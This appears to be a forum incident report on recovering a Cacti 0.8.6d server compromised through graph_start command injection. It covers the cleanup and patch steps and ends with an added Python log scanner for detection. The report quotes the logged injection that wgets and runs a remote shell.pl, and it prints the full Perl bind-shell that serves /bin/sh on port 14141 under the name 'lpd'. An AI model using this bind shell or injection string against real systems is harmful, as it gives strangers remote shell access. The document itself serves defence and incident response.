I found the process by using top and typing 'P' to sort by CPU usage. Upon spotting the errant Perl processes I killed them with 'kill -9 process_id1 process_id2'.
An alternate method, grepping ps, is below.
Next by looking at "/tmp/shell.pl" I found that a socket was being created on 14141. In another shell.pl attempt, socket 4444 was being used.
Checking 'netstat -l | grep -e "14141\|4444"' indeed a socket was open and listening.
As I don't know how to close the sockets, I'm awaiting my data center to let me know how to do it.
In grepping my Apache logs, see below, I found "shell.pl" in them and traced it back to Cacti. Once I checked the forums here, I found that 0.8.6d had an injection flaw. I then went to my cacti directory and ran "cvs up -rRELEASE_0_8_6e" to update it.
After upgrading, diff your includes/config.php with includes/config.php.dist to find out about any changes such as includes, variable initializers, and versions.
Being a vi user, I used "vimdiff config.php config.php.dist" to quickly copy one line or so of code from one config to another.
Next, visit your Cacti install URL and upgrade. For me it was 0.8.6d to 0.8.6e.
Though not specifically stated, I went into my Cacti Console > System Utilities and cleared both Poller Cache and Log file.
Then go visit your normal Cacti graph URL to see if any errors show.
Lastly, to help make me aware of these undesired openings of Internet service sockets in the future, I downloaded and installed LSM (Linux Socket Monitor) from http://rfxnetworks.com/lsm.php. This essentially takes a baseline shot of current open sockets and, by default every 10 minutes, reports via email if there's been a change.
Good luck and I hope this helps others.
Michael
http://cannonbose.com/cacti/graph_view. ... on=preview
Processes - "ps -aux | grep shell"
105:nobody 11101 0.0 0.0 2172 952 ? S Jun23 0:00 sh -c /usr/local/bin/rrdtool graph - --imgformat=PNG --start=?cd /tmp;wget http://albythebest.altervista.org/shell.pl;chmod 777 shell.pl;perl shell.pl? --end=-300 --title="Charley - CPU Usage" --rigid --base=1000 --height=120 --width=500 --alt-auto
120:nobody 16433 0.0 0.0 2172 968 ? S 03:20 0:00 sh -c /usr/local/bin/rrdtool graph - --imgformat=PNG --start=?cd /tmp;wget http://219.238.232.208/pub/I386/shell.pl;chmod 777 shell.pl;perl shell.pl? --end=-300 --title="Charley - CPU Usage" --rigid --base=1000 --height=120 --width=500 --alt-autosc
root@delta:/usr/local/cacti/include # netstat -l | grep -e "14141\|4444"
warning, got duplicate tcp line.
warning, got duplicate tcp line.
46:tcp 0 0 *:14141 *:* LISTEN
Apache Log
root@delta:/usr/local/apache/logs # grep -rn "shell.pl" access_log
59489:200.222.106.252 - - [23/Jun/2005:09:58:59 -0500] "GET /cacti/graph_image.php?local_graph_id=50&graph_start=%0acd%20/tmp;wget%20http://albythebest.altervista.org/shell.pl;chmod%20777%20shell.pl;perl%20shell.pl%0a HTTP/1.1" 200 128
#!/usr/bin/perl
use Socket;
$port=14141;
$proto=getprotobyname('tcp');
$cmd="lpd";
$system='/bin/sh';
$0=$cmd;
socket(SERVER, PF_INET, SOCK_STREAM, $proto) or die "socket:$!";
setsockopt(SERVER, SOL_SOCKET, SO_REUSEADDR, pack("l", 1)) or die "setsockopt: $!";
bind(SERVER, sockaddr_in($port, INADDR_ANY)) or die "bind: $!";
listen(SERVER, SOMAXCONN) or die "listen: $!";
for(;$paddr=accept(CLIENT, SERVER);close CLIENT) {
open(STDIN, ">&CLIENT");
open(STDOUT, ">&CLIENT");
open(STDERR, ">&CLIENT");
system($system);
close(STDIN);
close(STDOUT);
close(STDERR);
}
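As an added defender-side example (not Michael's code and not part of Cacti), here is a small Python scanner that does the Apache log grep above more precisely: it URL-decodes every graph_image.php query parameter and flags any value carrying a newline or shell metacharacter, which is the shape of the %0a injection in the logged request. The first sample line is the one quoted in the post; the second is a constructed benign request for contrast.

```python
import re
from urllib.parse import unquote

# Constructed sample: line 1 is the request quoted in the post above,
# line 2 is a made-up benign graph request used as a control.
SAMPLE_LOG = """\
200.222.106.252 - - [23/Jun/2005:09:58:59 -0500] "GET /cacti/graph_image.php?local_graph_id=50&graph_start=%0acd%20/tmp;wget%20http://albythebest.altervista.org/shell.pl;chmod%20777%20shell.pl;perl%20shell.pl%0a HTTP/1.1" 200 128
192.0.2.10 - - [23/Jun/2005:10:01:12 -0500] "GET /cacti/graph_image.php?local_graph_id=50&graph_start=-86400&graph_end=-300 HTTP/1.1" 200 9123
"""

# Apache combined/common log: client IP, timestamp, request line, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Characters that have no business in a graph_start/graph_end value but let a
# value break out of the rrdtool command line once it is decoded.
SHELL_META = re.compile(r'[\n\r;|`&]|\$\(')


def parse_query(target):
    """Decode the query string by hand so a literal ';' inside a value is kept
    (older parse_qs versions treat ';' as a pair separator and would hide it)."""
    _, _, query = target.partition("?")
    params = {}
    for pair in query.split("&"):
        if pair:
            name, _, value = pair.partition("=")
            params[unquote(name)] = unquote(value)
    return params


def suspicious_params(target):
    """Return {param: decoded value} for every value containing shell metacharacters."""
    return {n: v for n, v in parse_query(target).items() if SHELL_META.search(v)}


def scan_access_log(text):
    """Return (ip, timestamp, param, decoded value) for each flagged request."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if m:
            for name, value in suspicious_params(m["target"]).items():
                findings.append((m["ip"], m["ts"], name, value))
    return findings


if __name__ == "__main__":
    for ip, ts, name, value in scan_access_log(SAMPLE_LOG):
        print(f"{ts} {ip} {name}={value!r}")
```

Run it over a real access_log by replacing SAMPLE_LOG with the file contents; a hit prints the decoded parameter so the injected command is readable without manual URL-decoding.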